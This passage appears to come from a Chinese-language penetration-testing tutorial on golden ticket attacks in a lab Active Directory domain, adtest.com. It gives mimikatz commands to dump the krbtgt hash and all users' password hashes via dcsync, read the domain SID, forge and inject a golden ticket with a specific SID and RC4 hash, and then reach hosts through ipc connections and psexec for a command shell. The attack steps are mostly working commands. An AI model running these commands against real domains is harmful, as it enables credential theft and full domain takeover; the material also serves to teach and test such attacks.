### 5.1.2 黄金票据利用

#### 1、导出 krbtgt 密码 hash

```bash
mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt

```

![](images/yushentou/15899764666841.png)


导出所有域内用户密码 hash 值:

```bash
mimikatz#lsadump::dcsync /domain:adtest.com /all /csv

```

![](images/yushentou/15899764756436.png)


#### 2、获取域 SID

在导出 krbtgt 的 hash 的时候已经包含了域 SID，也可以用以下命令来查看域 SID

```
whoami /all

```

![](images/yushentou/15899764856248.png)


#### 3、伪造黄金票据

```bash
mimikatz.exe privilege::debug "kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM /service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt"

```

这里可以不指定 target 和 service

```bash
kerberos::golden /domain:adtest.com /sid:S-1-5-21-3418659180-3421952656-
1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt

```

![](images/yushentou/15899765021886.png)


使用 klist 查看本地缓存的票据

![](images/yushentou/15899765122199.png)


获得票据后可直接通过 dir 远程访问主机，可以直接使用 ipc 进行连接:

![](images/yushentou/15899765195470.png)


当然也可以使用 psexec 去获得一个 cmdshell:

![](images/yushentou/15899765276427.png)


> 注:普通黄金票据不能跨域使用;TGT 有效时间为 20 分钟;。